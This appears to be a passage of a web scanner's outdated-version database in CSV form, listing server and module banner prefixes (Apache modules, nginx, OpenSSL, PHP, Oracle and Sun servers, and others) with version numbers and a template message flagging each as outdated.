"600477","mod_mp3idver/","0.12","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600478","mod_mrim/","0.17","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600479","mod_mundinteractivos/","2.1.4","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600480","mod_mya/","3.0.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600481","mod_mylo/","0.2.2","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600482","mod_nsn/","1.0_0-dev","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600483","mod_oas/","5.8","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600484","Mod_OOiS/","0.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600485","mod_oprocmgr/","1.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600486","mod_pcgi2/","2.0.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600487","mod_perl/","2.0.7","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600488","mod_plsql/","10.1.3.1.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600489","mod_pointer/","0.8","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600490","mod_protection/","0.0.2","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600491","mod_psoft_traffic/","0.2","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600492","mod_pubcookie/","3.3.3","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600493","mod_pubcookie/a5/","1.77.2.4","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600494","mod_python/","3.3.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600495","mod_random/","2.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600496","mod_rbcban/","2.7","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600497","mod_rdbcookie/","1.2","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600498","mod_relocate/","1.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600499","mod_repository/","0.3","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600500","mod_require_host/","2.3","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600501","mod_roaming/","2.0.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600502","mod_rpaf/","0.6","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600503","mod_rsawebagent/","7.0.2[379]","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600504","mod_ruby/","1.3.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600505","mod_scgi/","1.14","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600506","Mod_security/","1.9","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600507","mod_session/","1.12","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600508","mod_sleep/","1.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600509","mod_snmp/","1.3.6.11","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600510","mod_spidercache/","1.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600511","mod_ssl/","2.8.31","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER) (may depend on server version)" "600512","mod_sugid_files/","2.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600513","mod_survey/","3.0.15","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600514","mod_suspend/","0.8","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600515","mod_tagx/","1.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600516","mod_tcl/","1.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600517","mod_text2html/","1.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600518","mod_throttle/","3.2.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600519","mod_trigger/","1.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600520","mod_tsunami/","3.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600521","mod_uwa/","3.2.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600522","mod_vdbh/","2.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600523","mod_vhost_ldap/","1.2.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600524","mod_vhost_mysql/","0.10","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600525","mod_view/","1.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600526","mod_virgule/","1.41","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600527","mod_virtual/","0.97.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600528","mod_watch/","4.3","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600529","mod_webapp/","1.2.0-dev","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600530","mod_webkit/","0.9.3","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600531","mod_webkit2/","0.9.3","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600532","mod_websh/","3.5.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600533","mod_wodan/","1.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600534","mod_xlayout_jh/","0.0.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600535","mod_xslt/","1.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600536","mod-xslt/","1.3.9","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600537","ModLayout/","5.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600538","ModNeva/","2.0.b","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600539","Monkey/","0.9.3","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600540","Mono-XSP Server/","1.0.5.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600541","Mono-XSPServer/","1.0.5.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600542","MontaVistaLinux/","2.1UPnP","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600543","MortBay-Jetty-","2.3.5","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600544","MS-MFC-HttpSvr/","1.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600545","MSIWB/","MSIWB/1.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600546","MTransit2/","1.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600547","Mya/","1.2","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600548","MyWebServer/","1.0.2","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600549","NaviServer/","2.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600550","NCSA-CRC+/","1.4.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600551","NCSA/","1.5.2","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600552","NDCAP/","2.00","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600553","NeoWebScript/","3.3.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600554","NetApp/","7.3.6","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600555","NetApp/","7.1P3D1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600556","NetApp/build.","RbecksN_000805_0805.000805_0940","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600557","NetCache appliance \(NetApp\/","6.1.1RC1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600558","NetCacheappliance\(NetApp\/","6.1.1RC1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600559","NetEVI/","3.01","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600560","NetPhantom/","3.61","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600561","NetPresenz/","4.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600562","NetPublisher/","1.10.020","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600563","Netrox-Apache/","1.3.24","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600564","Netscape-Administrator/","3.54","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600565","Netscape-Brew/","6.3","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600566","Netscape-Commerce/","1.13","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600567","Netscape-Communications/","1.12","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600568","Netscape-Enterprise/","6.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600569","Netscape-FastTrack/","4.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600570","Netscape-Proxy/","3.52","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600571","NetWare-Enterprise-Web-Server/","5.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600572","NetZoom","1.00","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600573","ngd/","4.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600574","mod_wsgi/","4.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600575","nginx/","1.0.4","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600576","Niagara Web Server/","1.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600577","NiagaraWebServer/","3.5.34","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600578","NIS/","1.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600579","Nitix/","4.2.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600580","Novell-HTTP-Server/","3.1R1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600581","NS_","6.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600582","Nucleus/","4.3","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600583","NUD/","3.9.2","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600584","NULLhttpd/","0.5.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600585","NYSED-A-Series/","2.0X","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600586","OAS/","4.57","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600587","OFIWebServer","1.2","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600588","OmniHTTPd/","2.10","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600589","OmniSecure/","3.0a3","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600590","Open-Market-Secure-WebServer/","V2.1.","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600591","Open-Market-Secure-WebServerGlobal/","2.0.10.RC0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600592","Open-Market-SecureLink-Bridge/","V2.1.RC0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600593","OpenPKG/","2.5","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600594","OpenSA/","1.0.4","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600595","OpenSSL/","1.0.1c","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER). OpenSSL 0.9.8r is also current." "600596","oplweb/","1.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600597","Oracle HTTP Server Powered by Apache/","1.3.22","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600598","Oracle_Web_Listener_NT_","2.1.0.3.1/1.20in2","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600599","Oracle_Web_Listener/","4.0.8.2.4","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600600","Oracle_Web_listener2.1/","1.20in2","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600601","Oracle_Web_listener3.0.2.0.0/","2.14FC1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600602","Oracle_Web_listener3.0/","2.13","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600603","Oracle_WebDb_Listener/","2.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600604","Oracle-Application-Server-10g/","10.1.3.5.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600605","Oracle9i Enterprise Edition Release ","9.2.0.1.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600606","Oracle9iAS ","(9.0.3.0.0) Containers for J2EE","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600607","Oracle9iAS-Web-Cache/","9.0.4.0.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600608","Oracle9iAS/","9.0.4","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600609","OracleAS-Web-Cache-10g/","10.1.2.3.2","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600610","Orion/","2.0.7","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600611","OSDK/","2.0.44","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600612","OSU/","3.10a","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600613","OWW/","29.3.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600614","Pack/","1.0-ea1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600615","PaintChatHTTP/","3.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600616","PasteWSGIServer/","0.5","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600617","Patchy/","1.3.28","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600618","PBFilter/","1.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600619","PCGI/","2.0a5","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600620","Perl/","v5.14.2","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600621","PersonalNetFinder/","1.0 ID/ACGI","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600622","PEWG/","1.2","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600623","Phantom/","2.2.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600624","PHP-CGI/","0.9","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600625","PHP/","5.4.4","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600626","PHP/FI-","2.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600627","PI/","7.5","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600628","Pi3Web/","2.0.3","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600629","pks_www/","0.9.6","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600630","plex/","9.5.2a","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600631","plexus/","3.0m","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600632","Polycom-WS/","1.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600633","Pow Web/","1.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600634","PowerDynamo Personal Web Server/","1.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600635","PoweredByIISBanner/","1.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600636","PowerWeb/","4.05r5","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600637","PowWeb/","1.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600638","Pramati Server/","6.0 SP2","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600639","PRINT_SERVER WEB ","1.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600640","ProfiHost.com/","1.3.28","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600641","Protocol ","1.99; Server OpenSSH_2.1.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600642","proxy_html/","3.1.2","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600643","prxp_module/","1.9.2","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600644","prxp_solo/","1.3","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600645","Purveyor / ","v1.2 Windows NT","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600646","Purveyor Encrypt Export/","v2.0-1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600647","Purveyor/","v1.3.3","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600648","PWPWEB/","1.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600649","PWS/","8.0.9","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600650","PWSERV-","65","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600651","PyApache/","4.19","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600652","Python/","2.7.3","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600653","QTSS/","6.1.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600654","QuantumCorporation./","3.4.790","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600655","query/","1.16.83","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600656","Quid Pro Quo/","2.2","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600657","QuidProQuo/","2.2","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600658","RAID HTTP Server/","1.11","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600659","RAIDHTTPServer/","1.11","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600660","Rapid Logic/","1.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600661","RapidLogic/","1.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600662","Rapidsite/Apa/","1.3.27","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600663","RAQdevil/","1.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600664","Rational_Web_Platform/","1.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600665","RCS/","3000","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600666","RealVNC/","4.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600667","Red-Hat-Secure/","3.2","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600668","RedHat/","3022","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600669","RedirServer/","1.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600670","Redline Networks Accelerator ","2.3.13","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600671","REMTEK/","1.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600672","RENSRV/v","8.43","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600673","Replicon Web Time Sheet/","6.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600674","RepliconWebTimeSheet/","6.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600675","Replique/v","0.2.5","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600676","Report Server/","3.5","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600677","Resin/","4.0.27","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600678","rewrit/","1.1a","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600679","rewrite/","3.3","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600680","Rex/","12.0.7601.17514","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600681","REXX_SOCKETS/","3.01","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600682","REXX/","4.01","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600683","RMSWebServer/","1.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600684","RomPager/","4.51","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600685","Roxen/","5.1.185_NT-release1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600687","Roxen·Challenger/","1.3.126","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600688","Ruby/","1.8.7","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600689","rus/","PL30.22","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600690","rwh/","1.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600691","S.u.S.E./","6.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600692","Sambar/","Sambar/5.3","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600693","SAPJ2EEEngine/","7.02","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600694","SAPOttpd/","1.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600695","Savant/","3.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600696","SDD/","1.3","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600697","Secure/","3.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600698","secured_by_Covalent/","1.6.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600699","secured_by_Raven/","1.5.3","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600700","SecureEntry/","0.1.8","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600702","SecureTransport/","4.9.2","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600703","SEDWebserver/","1.3.26","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600704","Seed/","4103c","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600706","Server:Apache/","1.2b7-dev","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600707","Server/","10.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600708","Servertec-IWS/","1.11","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600709","Service admin/","1.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600710","Servlet/","2.5","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600711","ServletExec/","3.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600712","ServletExecAS/","3.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600713","Shadow-OS-390-Web-Server/","04.08.01","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600714","SHC/","1.5.8b","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600715","ShomitiTHGs/","3.10","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600716","Signature/","2.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600717","SilverStream Server/","3.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600718","SilverStreamServer/","100.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600719","Simple, Secure Web Server ","1.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600720","SimpleHTTP/","1.2","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600721","SimpleWebserver/","2.13","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600722","simwebs/","4.0.6","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600723","SiteScope/","8.0.0.2","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600724","SkunkWeb/","3.4b3","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600725","Slinger/","1.1a","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600726","Sly-ISUmods/","2.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600727","Smart CDS/","2.9-final","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600728","SmartCDS/","2.9-final","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600729","SmartServer/","4.08.0002","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600730","SmiskigWWWServer/","69","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600731","Snap Appliances, Inc./","3.0.566","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600732","SNMP Research DR-Web Agent/","1.25.4.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600733","SomeServer/","4.4","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600734","SonarHosting/","1.3.27","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600735","SpaceSurfer/","1.4","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600736","SpecialixJETSTREAM/","1.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600737","Speed Touch Web Server/","1.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600738","SpeedTouchWebServer/","1.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600739","Spinnaker/","3.12","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600740","SpinServer/","1.0.00","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600741","Spipe/","1.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600742","Splash/","3.0.3(Foo-nix)","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600743","Spry-SafetyWEB-Server-NT/","1.3a","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600744","Spyglass_MicroServer/","2.01FC1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600745","Squeegit/","1.2.5","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600746","Squid/","3.1.18","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600747","SSI/","POEM-iso2022-20001201","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600748","SSL/","1.15","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600749","SSLeay/","0.9.0b","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600750","SST/","210q","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600751","Statistics Server ","5.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600752","Stonghold/","2.4.2","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600753","StorageNetFibreChannelAccessHub/","V1.2","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600754","StorageTekAccessHub/","V1.2","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600755","StoreSense-Bridge/","1.4","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600756","Streamer-Server/","3.1.18","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600757","Stronghold/","4.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600758","StummCom/","1.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600759","StWeb/","1.3.27","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600760","Sun Directory Services ","3.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600761","Sun_WebServer/","2.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600762","Sun-Java-System-Application-Server/","72004Q2UR5","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600763","Sun-Java-System-Web-Server/","7.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600764","Sun-ONE-Application-Server/","7.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600765","Sun-ONE-ASP/","4.0.3","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600766","Sun-ONE-Web-Server/","6.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600767","SunOS/","5.8","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600768","SVN/","1.7.4","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600769","sw/","1.7","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600770","swcd/","5.2.0032","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600771","SWS-","2.3","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600772","sxnet/","1.2.4","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600773","System Management Homepage/","2.1.6.156","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600774","T-httpd/","1.2.7","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600775","T/","1.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600776","TAC/","Xenta 5111.10","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" 